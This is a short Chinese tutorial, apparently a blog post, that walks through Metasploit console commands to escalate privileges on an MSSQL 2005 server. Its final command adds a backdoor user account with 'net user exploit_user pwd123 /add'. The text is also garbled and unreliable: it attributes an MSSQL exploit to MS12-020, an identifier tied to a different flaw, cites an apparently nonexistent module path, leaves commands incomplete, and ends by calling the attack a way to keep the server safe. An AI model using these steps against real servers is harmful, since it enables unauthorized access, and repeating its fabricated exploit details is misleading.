MSF(Metasploit Framework)是一套非常优秀的攻击框架,不仅可以帮助我们在渗透测试中快速有效的探测目标系统,而且具备了极其强大的提权、利用能力。目前开发的越来越多的操作系统,特权的提高,安全威胁也加大,想要更好的安全管理就必须增加额外的设置,而MSF就是其中重要的一支解决方案。
MSSQL(Microsoft SQL Server)是微软提供的关系型数据库,它可以用于存储、处理和管理各种数据类型,为用户提供高效可靠的基础支持服务,MSSQL已经成为当今企业数据库技术要求中必不可少的一部分。
为了保护MSSQL服务器,需要管理员正确的设置相应的权限,以免发生未授权访问的危害。MSF提供了一种可用的方法,可以无限地提升MSSQL服务器的特权。通过MSF可以模糊搜索出MSSQL服务器的漏洞,并构建一个漏洞的攻击模型,尝试利用漏洞提升账户的特权,从而可以实现“一键开启”MSSQL服务器的权限。
下面以MSF脚本ms12-020_mssql_noauthentication作例,针对微软MSSQL2005提供一个简单的脚本,来演示如何快速利用MSF提权MSSQL服务器。
首先,打开MSF控制台,首先执行:
msf > use exploit / windows / mssql / ms12-020_mssql_noauthentication
指定服务器地址,修改RHOST
msf exploit ( mssql / ms12-020_mssql_noauthentication )> set RHOST
指定shell生成模式,修改PAYLOAD
msf exploit ( mssql / ms12-020_mssql_noauthentication )> PAYLOAD windows / exec
设置服务器地址和端口
msf exploit ( mssql / ms12-020_mssql_noauthentication )> set RPORT 1433
设置执行脚本
msf exploit ( mssql / ms12-020_mssql_noauthentication )> set CMD net user exploit_user pwd123 / add
此时已经准备就绪,可以执行命令
msf exploit ( mssql / ms12-020_mssql_noauthentication )> exploit
最终会看到一个新建的用户,在MSSQL服务器上成功提权,从而可以无限开启MSSQL服务器的权限
综上所述,MSF提供了一个简单有效的提权方法,让MSSQL服务器可以安全有效的运行。但是,同时也需要管理员对系统进行安全防御,保护安全环境。